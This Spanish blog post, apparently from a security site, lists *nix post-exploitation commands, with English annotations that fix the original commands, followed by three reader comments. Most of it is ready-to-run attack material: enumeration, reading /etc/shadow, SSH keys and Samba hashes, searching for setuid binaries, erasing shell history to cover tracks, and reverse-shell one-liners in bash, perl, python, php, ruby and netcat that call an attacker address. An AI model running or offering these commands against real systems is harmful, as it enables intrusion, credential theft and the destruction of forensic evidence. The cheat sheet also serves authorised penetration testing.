Comandos útiles de *nix para pen-testers/hackers

Hoy rescatamos una entrada de c0rrupt en la que se recopilan diversos comandos que nos serán útiles para la post-explotación de un sistema Linux/Unix. Como siempre, si conocéis cualquier otro y queréis compartirlo no dudéis en comentar!

BLIND FILES
/etc/resolv.conf (legible por cualquier usuario; a diferencia de /etc/shadow, leerlo rara vez dispara reglas de auditoría o de un HIDS)
/etc/motd, /etc/issue
/etc/passwd
SISTEMA
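# --- System enumeration (unprivileged) ---
# Kernel, running processes, identity, hardware and which toolchains /
# interpreters are available for later stages.
uname -a
ps aux
top -b -n 1            # batch mode, single iteration: safe to pipe or redirect
id
arch
w
who -a
gcc -v
mysql --version
perl -v
ruby -v
python --version       # try python3 --version where no "python" alias exists
df -k
mount
last -a
lastlog
lastlogin              # *BSD counterpart of lastlog
getenforce             # SELinux mode (Enforcing/Permissive/Disabled); absent on non-SELinux hosts
dmesg                  # may be root-only when kernel.dmesg_restrict=1
lspci
lsusb
lshw
lshw -c network
free -m
cat /proc/cpuinfo
cat /proc/meminfo
du -h --max-depth=1 /
# Check whether useful tooling is already present before uploading your own.
# command -v is POSIX and also resolves builtins/aliases; which is not.
command -v nmap
locate bin/nmap
command -v nc
locate bin/            # locate depends on an updatedb index that may be stale or missing
whoami
jps -l                 # JVM processes, when a JDK is installed
java -version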
RED
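# --- Network: interfaces, routes, firewall, listeners, neighbours ---
hostname -f
ip addr show
ifconfig -a            # legacy net-tools; may be missing where only iproute2 is installed
route -n
ip route show          # iproute2 equivalent of route -n
cat /etc/network/interfaces
iptables -L -n         # needs root; -n avoids slow reverse-DNS lookups
iptables-save          # needs root; full ruleset including nat/mangle tables
netstat -anop
netstat -r
netstat -nltupw        # owning process shown only for your own sockets unless root (raw sockets for -w)
ss -tulpn              # iproute2 replacement where netstat is absent
arp -a
ip neigh show          # iproute2 equivalent of arp -a
lsof -nPi              # as root lists every process's sockets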
CONFIGURACIONES
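# --- Configuration files of interest (most readable without privileges) ---
# World-writable entries under /etc (awk: 'other' write bit set), symlinks
# excluded. stderr is silenced on ls, which is where the permission errors
# come from (the original silenced grep, which emits none).
ls -aRl /etc/ 2>/dev/null | awk '$1 ~ /w.$/' | grep -v lrwx
cat /etc/issue{,.net}
cat /etc/passwd
cat /etc/shadow        # root-only on a sane host, but always worth a try
cat /etc/shadow~       # editor backup (e.g. gedit) sometimes left world-readable
cat /etc/master.passwd # *BSD
cat /etc/group
cat /etc/hosts
cat /etc/crontab
cat /etc/sysctl.conf
# Every user's crontab. crontab -u needs root, so as an ordinary user only
# your own entry is listed and the rest fail with a "must be privileged" error.
for user in $(cut -f1 -d: /etc/passwd); do echo "$user"; crontab -u "$user" -l; done
cat /etc/resolv.conf
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /opt/lampp/etc/httpd.conf
cat /etc/samba/smb.conf
cat /etc/openldap/ldap.conf
cat /etc/ldap/ldap.conf
pdbedit -L -w          # Samba passdb in smbpasswd format (includes NT hashes); root
pdbedit -L -v          # Samba passdb, verbose; root
cat /etc/exports       # NFS exports: look for no_root_squash and world-accessible shares
cat /etc/auto.master
cat /etc/auto_master
cat /etc/fstab         # may embed CIFS/NFS credentials or credentials= file paths
find /etc/sysconfig/ -type f -exec cat {} \;
cat /etc/sudoers       # root-only; sudo -l gives the per-user view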
DETERMINAR DISTRIBUCIÓN:
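# --- Distribution fingerprint ---
cat /etc/os-release    # standard on current distros; read this first
cat /etc/*release
# Legacy per-distro release files (read whichever exists):
#   /etc/SUSE-release                              Novell SUSE
#   /etc/redhat-release, /etc/redhat_version       Red Hat
#   /etc/fedora-release                            Fedora
#   /etc/slackware-release, /etc/slackware-version Slackware
#   /etc/debian_release, /etc/debian_version       Debian
#   /etc/mandrake-release                          Mandrake
#   /etc/sun-release                               Sun JDS
#   /etc/release                                   Solaris/SPARC
#   /etc/gentoo-release                            Gentoo
#   /etc/lsb-release                               Ubuntu
#   /etc/arch-release                              Arch Linux (typically an empty marker file; use os-release)
arch                   # on OpenBSD prints e.g. "OpenBSD.amd64"
uname -a               # the kernel build string often names the distro as well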
PAQUETES INSTALADOS
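# --- Installed packages (versions drive the local-exploit search) ---
rpm -qa --last | head              # RPM: most recently installed first
yum list installed
dpkg -l
dpkg -l | grep -i "linux-image"    # installed kernel packages (Debian/Ubuntu); original used typographic quotes
pkg_info                           # FreeBSD, legacy pkg_* tools
pkg info                           # FreeBSD with pkg(8)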
FUENTES, REPOSITORIOS DE SOFTWARE
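# --- Package sources: which repositories/mirrors the host trusts ---
cat /etc/apt/sources.list
cat /etc/apt/sources.list.d/*     # additional APT sources, if any
ls -l /etc/yum.repos.d/
cat /etc/yum.conf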
ENCONTRAR FICHEROS IMPORTANTES
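# --- Interesting files: logs, mounts, temp, home directories, archives, configs ---
find /var/log -type f -exec ls -la {} \;
ls -alhtr /mnt
ls -alhtr /media
ls -alhtr /tmp
ls -alhtr /home
tree /home             # same listing as "cd /home; tree" without changing cwd
ls /home/*/.ssh/*
find /home -type f -iname '.*history'
ls -lart /etc/rc.d/
# locate patterns are quoted: an unquoted [.]tar$ is also a shell glob and
# would be expanded against the current directory before grep sees it.
locate tar | grep '[.]tar$'
locate tgz | grep '[.]tgz$'
locate sql | grep '[.]sql$'       # original had "l" where the pipe belongs
locate settings | grep '[.]php$'
locate config.inc | grep '[.]php$'
ls /home/*/id*         # stray key copies outside .ssh (the .ssh/ ones are listed above)
locate .properties | grep '[.]properties'   # Java configuration files
locate .xml | grep '[.]xml'                 # Java/.NET configuration files
# setuid binaries (privilege-escalation candidates). The original's quoting was
# broken ('sed s/:/ /g' as one word); $PATH is split on ':' and deliberately
# left unquoted so each directory becomes a separate argument.
find /sbin /usr/sbin /opt /lib $(echo "$PATH" | tr ':' ' ') -perm -4000 -type f 2>/dev/null
find / -perm -4000 -type f 2>/dev/null      # exhaustive but slower; -perm -2000 for setgid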
BORRANDO TUS HUELLAS
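# --- Covering tracks: keep this shell's history off disk ---
# Bash writes $HISTFILE only at exit, so blank it FIRST (before anything
# sensitive is typed) and then drop what is already in memory.
# Alternative for the current session only: set +o history
export HISTFILE=
history -c
# Replace the history file with a symlink to /dev/null so later sessions write
# nowhere. ln -s takes TARGET then LINKNAME; the original had them reversed and
# would have produced a dangling link to a non-existent file, not a sink.
rm -f ~/.bash_history && ln -s /dev/null ~/.bash_history
# On an authorized engagement keep your own activity log elsewhere: this
# destroys evidence the client may need for their incident report.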
ACCIONES POR USUARIO
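# --- Per-user artefacts: keys, known hosts, shell and tool history ---
ls -alh /home/*/
ls -alh /home/*/.ssh/
cat /home/*/.ssh/authorized_keys   # who can log in as these users; note from=/command= restrictions
cat /home/*/.ssh/known_hosts       # lateral-movement targets (entries may be hashed)
cat /home/*/.*hist*
find /home/*/.vnc /home/*/.subversion -type f   # paths before expressions; the original had them reversed
grep ^ssh /home/*/.*hist*
grep ^telnet /home/*/.*hist*       # original carried a stray backtick before the path
grep ^mysql /home/*/.*hist*        # passwords are often passed on the command line (-pSECRET)
cat /home/*/.viminfo               # recently edited files plus search/command history
sudo -l                            # per-user view even when /etc/sudoers is unreadable; may prompt for a password
crontab -l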
PRIVILEGIADO (vía sudo o como root)
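# --- With root (or sudo): what the unprivileged pass could not read ---
ls -alh /root/
cat /etc/sudoers
cat /etc/shadow
cat /etc/master.passwd             # *BSD
# Per-user crontabs live under one of these paths depending on the distro.
# The original piped one cat into another; cat ignores stdin when given file
# arguments, so the first listing was silently discarded.
cat /var/spool/cron/crontabs/* /var/spool/cron/*
lsof -nPi
ls /home/*/.ssh/*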
SHELL INVERSO
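# --- Reverse shells: replace 10.0.0.1 / port with your listener (e.g. nc -lvnp 1234) ---
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
# PHP: assumes the socket lands on fd 3; try 4, 5, 6 if the shell comes up blind.
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
# The original ran the ruby and nc one-liners together and split the IP across
# two lines; they are separate commands.
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
# netcat: -e exists only in nc.traditional / ncat; OpenBSD netcat (the Debian
# and Ubuntu default) has no -e, so use the FIFO relay below instead.
nc -e /bin/sh 10.0.0.1 1234
# FIFO relay for a netcat without -e. A fixed /tmp/f is predictable and the
# original rm would clobber a pre-existing file; mktemp -u picks a fresh name.
f=$(mktemp -u); mkfifo "$f"; cat "$f" | /bin/sh -i 2>&1 | nc 10.0.0.1 1234 >"$f"
# X11 back-connect: an interactive xterm rendered on the attacker's X server.
xterm -display 10.0.0.1:1
# On the attacker: nested X server as display :1, then allow only the victim
# to connect. Never run a bare "xhost +", which opens the display to everyone.
Xnest :1
xhost +victimIP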

3 comentarios :

  1. Un buen listado de comandos útiles en varios sistemas operativos

    http://www.room362.com/blog/2011/9/6/post-exploitation-command-lists.html

  2. ¡Debéis citar las fuentes! Se parece bastante a lo publicado en room362.com jeje :-)

  3. Cito la fuente al principio del post, concretamente es https://c0rrupt.net/forum/*nix-systems/2180-usefill-cmds-*nix-pen-testers-hackers.html.
    Probablemente hayan sacado la información de room362.com, pero no lo especifican.

    También, y a propósito de la entrada, comentar que había un script en Python llamado Intersect que automatizaba la tarea. Pero me temo que el proyecto murió :(

    http://www.hackplayers.com/2012/02/intersect-20-herramienta-de-post.html
